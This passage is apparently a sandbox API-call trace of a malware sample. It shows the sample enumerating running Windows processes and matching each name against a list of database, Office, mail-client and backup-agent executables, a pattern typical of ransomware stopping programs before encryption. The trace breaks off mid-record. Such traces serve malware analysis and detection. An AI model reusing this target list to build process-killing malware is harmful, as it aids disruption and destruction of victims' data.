[0106.097] lstrcmpiW (lpString1="fling.exe", lpString2="mysqld-opt") returned -1 [0106.097] lstrcmpiW (lpString1="fling.exe", lpString2="dbeng50.exe") returned 1 [0106.097] lstrcmpiW (lpString1="fling.exe", lpString2="sqbcoreservice.exe") returned -1 [0106.097] lstrcmpiW (lpString1="fling.exe", lpString2="excel.exe") returned 1 [0106.097] lstrcmpiW (lpString1="fling.exe", lpString2="infopath.exe") returned -1 [0106.097] lstrcmpiW (lpString1="fling.exe", lpString2="msaccess.exe") returned -1 [0106.097] lstrcmpiW (lpString1="fling.exe", lpString2="mspub.exe") returned -1 [0106.097] lstrcmpiW (lpString1="fling.exe", lpString2="onenote.exe") returned -1 [0106.097] lstrcmpiW (lpString1="fling.exe", lpString2="outlook.exe") returned -1 [0106.097] lstrcmpiW (lpString1="fling.exe", lpString2="powerpnt.exe") returned -1 [0106.098] lstrcmpiW (lpString1="fling.exe", lpString2="stream.exe") returned -1 [0106.098] lstrcmpiW (lpString1="fling.exe", lpString2="thebat.exe") returned -1 [0106.098] lstrcmpiW (lpString1="fling.exe", lpString2="thebat64.exe") returned -1 [0106.098] lstrcmpiW (lpString1="fling.exe", lpString2="Thunderbird.exe") returned -1 [0106.098] lstrcmpiW (lpString1="fling.exe", lpString2="visio.exe") returned -1 [0106.098] lstrcmpiW (lpString1="fling.exe", lpString2="winword.exe") returned -1 [0106.098] lstrcmpiW (lpString1="fling.exe", lpString2="wordpad.exe") returned -1 [0106.098] lstrcmpiW (lpString1="fling.exe", lpString2="sqlwb.exe") returned -1 [0106.098] lstrcmpiW (lpString1="fling.exe", lpString2="sqlbrowser.exe") returned -1 [0106.098] lstrcmpiW (lpString1="fling.exe", lpString2="agntsvcagntsvc.exe") returned 1 [0106.098] lstrcmpiW (lpString1="fling.exe", lpString2="agntsvcencsvc.exe") returned 1 [0106.200] lstrcmpiW (lpString1="fling.exe", lpString2="agntsvcisqlplussvc.exe") returned 1 [0106.200] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0106.201] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="SearchIndexer.exesqlservr.exe") returned -1 [0106.201] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="msftesql.exe") returned -1 [0106.201] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="sqlagent.exe") returned -1 [0106.201] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="sqlwriter.exe") returned -1 [0106.201] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="oracle.exe") returned -1 [0106.201] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="ocssd.exe") returned -1 [0106.201] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="dbsnmp.exe") returned 1 [0106.201] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="synctime.exe") returned -1 [0106.201] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="mydesktopqos.exe") returned -1 [0106.201] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="agntsvc.exe") returned 1 [0106.201] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="isqlpplussvc.exe") returned -1 [0106.201] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="isqlpussvc.exe") returned -1 [0106.202] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="xfssvccon.exe") returned -1 [0106.202] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="mydesktopservice.exe") returned -1 [0106.202] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="ocautoupds.exe") returned -1 [0106.202] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="encsvc.exe") returned 1 [0106.202] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="firefoxconfig.exe") returned 1 [0106.202] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="tbirdconfig.exe") returned -1 [0106.202] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="ocomm.exe") returned -1 [0106.202] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="mysqld.exe") returned -1 [0106.202] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="mysqld-nt") returned -1 [0106.202] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="mysqld-opt") returned -1 [0106.202] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="dbeng50.exe") returned 1 [0106.202] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="sqbcoreservice.exe") returned -1 [0106.202] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="excel.exe") returned 1 [0106.202] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="infopath.exe") returned -1 [0106.202] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="msaccess.exe") returned -1 [0106.202] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="mspub.exe") returned -1 [0106.202] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="onenote.exe") returned -1 [0106.202] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="outlook.exe") returned -1 [0106.202] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="powerpnt.exe") returned -1 [0106.203] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="stream.exe") returned -1 [0106.203] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="thebat.exe") returned -1 [0106.203] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="thebat64.exe") returned -1 [0106.203] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0106.204] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0106.205] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0106.206] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0106.207] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0106.208] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0106.210] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0106.211] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0106.213] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0106.214] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0106.216] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0106.217] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0106.219] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0106.220] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0106.222] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0106.224] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0106.225] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0106.226] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0106.227] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0106.229] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0106.230] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x91c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0106.232] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0106.234] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0106.237] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0106.238] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0106.349] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0106.358] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0106.360] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0106.361] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x99c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0106.363] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0106.365] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0106.366] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="map enquiries.exe")) returned 1 [0106.367] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scenic.exe")) returned 1 [0106.369] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="rider.exe")) returned 1 [0106.370] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0106.372] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0106.373] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.374] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhtop32bit.exe")) returned 1 [0106.375] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0106.377] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.378] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0106.379] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.380] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0106.382] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.383] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0106.384] CloseHandle (hObject=0x210) returned 1 [0106.384] GetCurrentThread () returned 0xfffffffe [0106.384] WaitForSingleObject (hHandle=0xfffffffe, dwMilliseconds=0x64) returned 0x102 [0106.595] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2b4 [0106.600] Process32FirstW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.601] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0106.602] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.603] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.604] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.604] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.605] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.606] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.607] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.608] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.609] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.609] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.610] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.611] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.612] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.613] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.614] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.614] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.615] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.616] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.617] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.618] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, 